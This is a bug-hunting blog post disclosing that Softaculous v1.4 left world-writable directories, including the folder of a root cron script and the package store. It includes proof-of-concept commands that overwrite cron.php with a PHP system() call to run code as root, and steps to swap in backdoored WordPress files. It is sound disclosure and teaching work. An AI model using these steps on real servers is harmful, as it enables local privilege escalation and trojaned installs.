Finding bugs PT I - Softaculous gives up root

Good times with bad permissions


Sometimes the easiest way to find security flaws isn't by looking at the source, but by simply observing what an application does to the environment. For example, a few things to look for are:


We'll use Softaculous v1.4 as an example. Immediately after installing the software, you can check to see what's been recently updated on the filesystem:

[root@host ~]# find / ! -path "/proc/*" -a ! -path "/sys/*" -mmin -1 2>/dev/null


That command will find all files and directories which were last modified less than 1 minute ago (-mmin -1). It will not display any errors (file descriptor 2 - stderr, or standard error - is redirected to /dev/null), and will also not display information regarding the /proc and /sys directories. Increase the -mmin time as needed, depending on how long the install took.

One file that was created when Softaculous was installed was a cron job for the root user at /etc/cron.d/softaculous which contained this command:

/usr/bin/php /usr/local/cpanel/whostmgr/docroot/cgi/softaculous/cron.php >> /dev/null 2>&1


Note the path to the cron.php file, and now observe this:

[root@host ~]# find / -type d -perm 777 2>/dev/null
/usr/local/cpanel/whostmgr/docroot/cgi/softaculous
/usr/local/cpanel/whostmgr/docroot/cgi/softaculous/enduser
/usr/local/cpanel/whostmgr/docroot/cgi/softaculous/enduser/themes
/usr/local/cpanel/whostmgr/docroot/cgi/softaculous/enduser/themes/default
/usr/local/cpanel/whostmgr/docroot/cgi/softaculous/enduser/themes/default/js
/usr/local/cpanel/whostmgr/docroot/cgi/softaculous/enduser/themes/default/admin
/usr/local/cpanel/whostmgr/docroot/cgi/softaculous/enduser/themes/default/images
/usr/local/cpanel/whostmgr/docroot/cgi/softaculous/enduser/themes/default/images/admin
/usr/local/cpanel/whostmgr/docroot/cgi/softaculous/enduser/main
/usr/local/cpanel/whostmgr/docroot/cgi/softaculous/enduser/main/functions
/usr/local/cpanel/whostmgr/docroot/cgi/softaculous/enduser/main/admin
/usr/local/cpanel/whostmgr/docroot/cgi/softaculous/enduser/main/classes
/usr/local/cpanel/whostmgr/docroot/cgi/softaculous/enduser/languages
/usr/local/cpanel/whostmgr/docroot/cgi/softaculous/enduser/languages/english
/usr/local/cpanel/whostmgr/docroot/cgi/softaculous/enduser/languages/english/admin
/usr/local/cpanel/whostmgr/docroot/cgi/softaculous/enduser/languages/spanish
/usr/local/cpanel/whostmgr/docroot/cgi/softaculous/enduser/languages/spanish/admin
/usr/local/cpanel/whostmgr/docroot/cgi/softaculous/enduser/softimages
/etc/cron.d
/var/softaculous

Yes, even /etc/cron.d.


The "find" command shown above searched the entire filesystem for any directories (-type d) with permissions of 0777. The first directory that was found was /usr/local/cpanel/whostmgr/docroot/cgi/softaculous, which is the same directory where the cron.php file is.


That is a devastating problem, because it allows anyone who can write to the filesystem to easily obtain root privileges. This isn't much different than a kernel vulnerability, in the sense that just 1 PHP script on your server that is remotely exploitable can lead to someone getting root. Consider the fact that Softaculous, just like Fantastico and Installatron, are basically delivery systems for PHP applications which are all but guaranteed to be exploitable.


To demonstrate how this can be a problem, run these commands as root:

[root@host ~]# mkdir /home/testing
[root@host ~]# chmod 777 /home/testing
[root@host ~]# echo testing > /home/testing/test


Now there should be a world writable directory at /home/testing which contains a file called test, which is owned by root. Now run these commands as an unprivileged (i.e. non-root) user:

[user@host ~]$ cd /home/testing
[user@host /home/testing]$ mv test test.old
[user@host /home/testing]$ touch test
[user@host /home/testing]$ rm -f test.old


Notice how the file test was able to be renamed by a user other than its owner (root), from within a directory which did not belong to the user. The non-root user was also able to create a file of the same name in its place, and even remove the original file.


Getting back to Softaculous, all we need to do is take similar actions against the cron.php file, then wait for the Softaculous cron job to run. Since the cron job runs as root, we can effectively execute whatever commands we want.

[user@host ~]$ cd /usr/local/cpanel/whostmgr/docroot/cgi/softaculous
[user@host /usr/local/cpanel/whostmgr/docroot/cgi/softaculous]$ mv cron.php{,.orig}
[user@host /usr/local/cpanel/whostmgr/docroot/cgi/softaculous]$ cat > cron.php << EOF
<?php system("id > /home/user/outfile"); ?>
EOF


After the cron job has been run:

[user@host ~]$ ls -l outfile
-rw-r--r-- 1 root root 88 Jun 15 16:16 outfile
[user@host ~]$ cat outfile
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)


This issue was addressed in Softaculous v1.5, which was released a short time later. But, due to another bug, this actually wasn't exploitable by default. Check the cron log (pretend this is all 1 line):

Jun 15 16:19:01 host crond[26393]: (root) CMD
(/usr/bin/php /usr/local/cpanel/whostmgr/docroot/cgi/softaculous/cron.php >> /dev/null 2>&1^M)

Did you see the problem? A stray carriage return (the ^M shown above) existed at the end of the cron file, causing the cron job to never actually run properly. This too was addressed in Softaculous v1.5.


A very real issue that did exist, however, was the ability for any local user to backdoor the various packages that Softaculous installed. Check the output from the find command above, where we looked for any world writable directories. The last directory found was /var/softaculous which is where all the packages (WordPress, phpBB, etc) are stored. Again, because of the bad permissions, any local user could wander into that directory and rename or remove anything inside, then create their own directory of the same name and populate it with their own (backdoored) files:

[user@host ~]$ cd /var/softaculous
[user@host /var/softaculous]$ mv wordpress{,.orig}
[user@host /var/softaculous]$ mkdir wordpress
[user@host /var/softaculous]$ cd wordpress
[user@host /var/softaculous/wordpress]$ vi index.php # insert malicious code, etc
[user@host /var/softaculous/wordpress]$ # copy the rest of the files over


Then once users installed WordPress via Softaculous, they would get the trojaned files.